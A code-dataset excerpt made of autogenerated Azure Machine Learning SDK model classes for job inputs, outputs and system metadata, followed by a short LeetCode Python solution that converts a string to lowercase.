:ivar job_input_type: Required. Specifies the type of job.Constant filled by server. Possible
values include: "UriFile", "UriFolder", "MLTable".
:vartype job_input_type: str or ~azure.mgmt.machinelearningservices.models.JobInputType
"""
_validation = {
'uri': {'required': True, 'pattern': r'[a-zA-Z0-9_]'},
'job_input_type': {'required': True},
}
_attribute_map = {
'mode': {'key': 'mode', 'type': 'str'},
'uri': {'key': 'uri', 'type': 'str'},
'description': {'key': 'description', 'type': 'str'},
'job_input_type': {'key': 'jobInputType', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
"""
:keyword mode: Input Asset Delivery Mode. Possible values include: "ReadOnlyMount",
"ReadWriteMount", "Download", "Direct", "EvalMount", "EvalDownload".
:paramtype mode: str or ~azure.mgmt.machinelearningservices.models.InputDeliveryMode
:keyword uri: Required. Input Asset URI.
:paramtype uri: str
:keyword description: Description for the input.
:paramtype description: str
"""
super(MLTableJobInput, self).__init__(**kwargs)
self.mode = kwargs.get('mode', None)
self.uri = kwargs['uri']
self.job_input_type = 'MLTable' # type: str
self.description = kwargs.get('description', None)
self.job_input_type = 'MLTable' # type: str
class SystemData(msrest.serialization.Model):
"""Metadata pertaining to creation and last modification of the resource.
:ivar created_by: The identity that created the resource.
:vartype created_by: str
:ivar created_by_type: The type of identity that created the resource. Possible values include:
"User", "Application", "ManagedIdentity", "Key".
:vartype created_by_type: str or ~azure.mgmt.machinelearningservices.models.CreatedByType
:ivar created_at: The timestamp of resource creation (UTC).
:vartype created_at: ~datetime.datetime
:ivar last_modified_by: The identity that last modified the resource.
:vartype last_modified_by: str
:ivar last_modified_by_type: The type of identity that last modified the resource. Possible
values include: "User", "Application", "ManagedIdentity", "Key".
:vartype last_modified_by_type: str or ~azure.mgmt.machinelearningservices.models.CreatedByType
:ivar last_modified_at: The timestamp of resource last modification (UTC).
:vartype last_modified_at: ~datetime.datetime
"""
_attribute_map = {
'created_by': {'key': 'createdBy', 'type': 'str'},
'created_by_type': {'key': 'createdByType', 'type': 'str'},
'created_at': {'key': 'createdAt', 'type': 'iso-8601'},
'last_modified_by': {'key': 'lastModifiedBy', 'type': 'str'},
'last_modified_by_type': {'key': 'lastModifiedByType', 'type': 'str'},
'last_modified_at': {'key': 'lastModifiedAt', 'type': 'iso-8601'},
}
def __init__(
self,
**kwargs
):
"""
:keyword created_by: The identity that created the resource.
:paramtype created_by: str
:keyword created_by_type: The type of identity that created the resource. Possible values
include: "User", "Application", "ManagedIdentity", "Key".
:paramtype created_by_type: str or ~azure.mgmt.machinelearningservices.models.CreatedByType
:keyword created_at: The timestamp of resource creation (UTC).
:paramtype created_at: ~datetime.datetime
:keyword last_modified_by: The identity that last modified the resource.
:paramtype last_modified_by: str
:keyword last_modified_by_type: The type of identity that last modified the resource. Possible
values include: "User", "Application", "ManagedIdentity", "Key".
:paramtype last_modified_by_type: str or
~azure.mgmt.machinelearningservices.models.CreatedByType
:keyword last_modified_at: The timestamp of resource last modification (UTC).
:paramtype last_modified_at: ~datetime.datetime
"""
super(SystemData, self).__init__(**kwargs)
self.created_by = kwargs.get('created_by', None)
self.created_by_type = kwargs.get('created_by_type', None)
self.created_at = kwargs.get('created_at', None)
self.last_modified_by = kwargs.get('last_modified_by', None)
self.last_modified_by_type = kwargs.get('last_modified_by_type', None)
self.last_modified_at = kwargs.get('last_modified_at', None)
class UriFileJobInput(JobInput, AssetJobInput):
"""UriFileJobInput.
All required parameters must be populated in order to send to Azure.
:ivar mode: Input Asset Delivery Mode. Possible values include: "ReadOnlyMount",
"ReadWriteMount", "Download", "Direct", "EvalMount", "EvalDownload".
:vartype mode: str or ~azure.mgmt.machinelearningservices.models.InputDeliveryMode
:ivar uri: Required. Input Asset URI.
:vartype uri: str
:ivar description: Description for the input.
:vartype description: str
:ivar job_input_type: Required. Specifies the type of job.Constant filled by server. Possible
values include: "UriFile", "UriFolder", "MLTable".
:vartype job_input_type: str or ~azure.mgmt.machinelearningservices.models.JobInputType
"""
_validation = {
'uri': {'required': True, 'pattern': r'[a-zA-Z0-9_]'},
'job_input_type': {'required': True},
}
_attribute_map = {
'mode': {'key': 'mode', 'type': 'str'},
'uri': {'key': 'uri', 'type': 'str'},
'description': {'key': 'description', 'type': 'str'},
'job_input_type': {'key': 'jobInputType', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
"""
:keyword mode: Input Asset Delivery Mode. Possible values include: "ReadOnlyMount",
"ReadWriteMount", "Download", "Direct", "EvalMount", "EvalDownload".
:paramtype mode: str or ~azure.mgmt.machinelearningservices.models.InputDeliveryMode
:keyword uri: Required. Input Asset URI.
:paramtype uri: str
:keyword description: Description for the input.
:paramtype description: str
"""
super(UriFileJobInput, self).__init__(**kwargs)
self.mode = kwargs.get('mode', None)
self.uri = kwargs['uri']
self.job_input_type = 'UriFile' # type: str
self.description = kwargs.get('description', None)
self.job_input_type = 'UriFile' # type: str
class UriFileJobOutput(JobOutputV2, AssetJobOutput):
"""UriFileJobOutput.
All required parameters must be populated in order to send to Azure.
:ivar mode: Output Asset Delivery Mode. Possible values include: "ReadWriteMount", "Upload".
:vartype mode: str or ~azure.mgmt.machinelearningservices.models.OutputDeliveryMode
:ivar uri: Output Asset URI. This will have a default value of
"azureml/{jobId}/{outputFolder}/{outputFileName}" if omitted.
:vartype uri: str
:ivar description: Description for the output.
:vartype description: str
:ivar job_output_type: Required. Specifies the type of job.Constant filled by server. Possible
values include: "UriFile".
:vartype job_output_type: str or ~azure.mgmt.machinelearningservices.models.JobOutputType
"""
_validation = {
'job_output_type': {'required': True},
}
_attribute_map = {
'mode': {'key': 'mode', 'type': 'str'},
'uri': {'key': 'uri', 'type': 'str'},
'description': {'key': 'description', 'type': 'str'},
'job_output_type': {'key': 'jobOutputType', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
"""
:keyword mode: Output Asset Delivery Mode. Possible values include: "ReadWriteMount", "Upload".
:paramtype mode: str or ~azure.mgmt.machinelearningservices.models.OutputDeliveryMode
:keyword uri: Output Asset URI. This will have a default value of
"azureml/{jobId}/{outputFolder}/{outputFileName}" if omitted.
:paramtype uri: str
:keyword description: Description for the output.
:paramtype description: str
"""
super(UriFileJobOutput, self).__init__(**kwargs)
self.mode = kwargs.get('mode', None)
self.uri = kwargs.get('uri', None)
self.job_output_type = 'UriFile' # type: str
self.description = kwargs.get('description', None)
self.job_output_type = 'UriFile' # type: str
class UriFolderJobInput(JobInput, AssetJobInput):
"""UriFolderJobInput.
All required parameters must be populated in order to send to Azure.
:ivar mode: Input Asset Delivery Mode. Possible values include: "ReadOnlyMount",
"ReadWriteMount", "Download", "Direct", "EvalMount", "EvalDownload".
:vartype mode: str or ~azure.mgmt.machinelearningservices.models.InputDeliveryMode
:ivar uri: Required. Input Asset URI.
:vartype uri: str
:ivar description: Description for the input.
:vartype description: str
:ivar job_input_type: Required. Specifies the type of job.Constant filled by server. Possible
values include: "UriFile", "UriFolder", "MLTable".
:vartype job_input_type: str or ~azure.mgmt.machinelearningservices.models.JobInputType
"""
_validation = {
'uri': {'required': True, 'pattern': r'[a-zA-Z0-9_]'},
'job_input_type': {'required': True},
}
_attribute_map = {
'mode': {'key': 'mode', 'type': 'str'},
'uri': {'key': 'uri', 'type': 'str'},
'description': {'key': 'description', 'type': 'str'},
'job_input_type': {'key': 'jobInputType', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
"""
:keyword mode: Input Asset Delivery Mode. Possible values include: "ReadOnlyMount",
"ReadWriteMount", "Download", "Direct", "EvalMount", "EvalDownload".
:paramtype mode: str or ~azure.mgmt.machinelearningservices.models.InputDeliveryMode
:keyword uri: Required. Input Asset URI.
:paramtype uri: str
:keyword description: Description for the input.
:paramtype description: str
"""
super(UriFolderJobInput, self).__init__(**kwargs)
self.mode = kwargs.get('mode', None)
self.uri = kwargs['uri']
self.job_input_type = 'UriFolder' # type: str
self.description = kwargs.get('description', None)
self.job_input_type = 'UriFolder' # type: str
| StarcoderdataPython |
6494807 | <gh_stars>1-10
"""
https://leetcode.com/problems/to-lower-case/
Implement function ToLowerCase() that has a string parameter str, and returns the same string in lowercase.
Example 1:
Input: "Hello"
Output: "hello"
Example 2:
Input: "here"
Output: "here"
Example 3:
Input: "LOVELY"
Output: "lovely"
"""
# time complexity: O(n), space complexity: O(1)
class Solution:
def toLowerCase(self, str: str) -> str:
result = ''
for s in str:
if ord('A') <= ord(s) <= ord('Z'):
result += chr(ord(s) - ord('A') + ord('a'))
else:
result += s
return result | StarcoderdataPython |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.